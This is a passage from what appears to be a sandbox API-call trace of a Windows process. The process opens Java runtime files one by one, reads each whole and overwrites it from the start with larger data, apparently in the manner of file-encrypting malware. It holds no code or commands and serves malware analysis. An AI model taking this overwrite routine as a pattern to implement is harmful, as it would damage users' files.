dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8204f [0128.740] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.740] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.740] ReleaseMutex (hMutex=0x168) returned 1 [0128.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0128.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfr.jar", lpUsedDefaultChar=0x0) returned 7 [0128.741] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0128.743] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0128.745] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8104f [0128.745] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0128.747] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8104f [0128.748] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.748] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0128.748] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.749] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.749] CloseHandle (hObject=0x1d8) returned 1 [0128.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\snmp.acl.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\snmp.acl.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.750] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.750] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd30 [0128.750] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.751] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.751] ReleaseMutex (hMutex=0x168) returned 1 [0128.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="snmp.acl.template", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="snmp.acl.template", lpUsedDefaultChar=0x0) returned 17 [0128.751] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf2bc*=0xd30, lpOverlapped=0x0) returned 1 [0128.753] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0128.753] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x12b8, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf2d0*=0x12b8, lpOverlapped=0x0) returned 1 [0128.754] CloseHandle (hObject=0x1d8) returned 1 [0128.754] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.758] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.758] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3124c2e [0128.758] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.758] ReleaseMutex (hMutex=0x168) returned 1 [0128.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rt.jar", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rt.jar", lpUsedDefaultChar=0x0) returned 6 [0128.759] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0128.762] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0128.764] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.192] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.193] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.194] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.195] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.197] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee80000 [0129.208] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.211] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0129.214] VirtualQuery (in: lpAddress=0x7ef00000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7ef00000, AllocationBase=0x7ef00000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.214] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ede0000 [0129.226] VirtualFree (lpAddress=0x7ee80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.572] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.575] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.575] VirtualQuery (in: lpAddress=0x7ee80000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7ee80000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0130.575] VirtualAlloc (lpAddress=0x7ee80000, dwSize=0x30000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ee80000 [0130.576] VirtualAlloc (lpAddress=0x7ee80000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ee80000 [0130.578] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.641] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.646] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.987] VirtualQuery (in: lpAddress=0x7eeb0000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7eeb0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0130.987] VirtualAlloc (lpAddress=0x7eeb0000, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x7eeb0000 [0130.987] VirtualAlloc (lpAddress=0x7eeb0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x7eeb0000 [0130.989] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.991] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.993] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0130.994] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.034] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.039] VirtualQuery (in: lpAddress=0x7eef0000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7eef0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0131.039] VirtualAlloc (lpAddress=0x7eef0000, dwSize=0x50000, flAllocationType=0x2000, flProtect=0x4) returned 0x7eef0000 [0131.039] VirtualAlloc (lpAddress=0x7eef0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x7eef0000 [0131.041] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.073] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.076] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.874] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.874] VirtualQuery (in: lpAddress=0x7ef40000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7ef40000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0131.874] VirtualAlloc (lpAddress=0x7ef40000, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef40000 [0131.875] VirtualAlloc (lpAddress=0x7ef40000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef40000 [0131.877] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.879] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.883] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.886] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0131.887] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x2fdf23c, dwLength=0x1c | out: lpBuffer=0x2fdf23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.887] VirtualAlloc (lpAddress=0x0, dwSize=0x210000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ebd0000 [0136.300] VirtualQuery (in: lpAddress=0x7e870000, lpBuffer=0x2fdf2b0, dwLength=0x1c | out: lpBuffer=0x2fdf2b0*(BaseAddress=0x7e870000, AllocationBase=0x7e870000, AllocationProtect=0x4, RegionSize=0x1e0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.300] VirtualFree (lpAddress=0x7e870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.300] VirtualQuery (in: lpAddress=0x7ea50000, lpBuffer=0x2fdf2b0, dwLength=0x1c | out: lpBuffer=0x2fdf2b0*(BaseAddress=0x7ea50000, AllocationBase=0x7ea50000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.301] VirtualFree (lpAddress=0x7ea50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.301] CloseHandle (hObject=0x1d8) returned 1 [0136.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.625] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.625] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9b7 [0136.625] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.625] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.625] ReleaseMutex (hMutex=0x168) returned 1 [0136.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0136.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="US_export_policy.jar", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="US_export_policy.jar", lpUsedDefaultChar=0x0) returned 20 [0136.626] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0x9b7, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x9b7, lpOverlapped=0x0) returned 1 [0136.650] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.651] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea4988*, nNumberOfBytesToWrite=0xf3f, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4988*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf3f, lpOverlapped=0x0) returned 1 [0136.651] CloseHandle (hObject=0x1cc) returned 1 [0136.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.653] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.653] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x55 [0136.653] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.653] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.654] ReleaseMutex (hMutex=0x168) returned 1 [0136.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bamako", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bamako", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bamako", lpUsedDefaultChar=0x0) returned 6 [0136.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fbaea8, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbaea8*, lpNumberOfBytesRead=0x2fdf2bc*=0x55, lpOverlapped=0x0) returned 1 [0136.655] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.656] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0136.656] CloseHandle (hObject=0x1cc) returned 1 [0136.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.658] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.658] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x350 [0136.659] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.659] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.659] ReleaseMutex (hMutex=0x168) returned 1 [0136.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Casablanca", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Casablanca", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Casablanca", lpUsedDefaultChar=0x0) returned 10 [0136.659] ReadFile (in: hFile=0x1cc, lpBuffer=0x25abb98, nNumberOfBytesToRead=0x350, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abb98*, lpNumberOfBytesRead=0x2fdf2bc*=0x350, lpOverlapped=0x0) returned 1 [0136.781] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.781] WriteFile (in: hFile=0x1cc, lpBuffer=0x2890d98*, nNumberOfBytesToWrite=0x8d8, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890d98*, 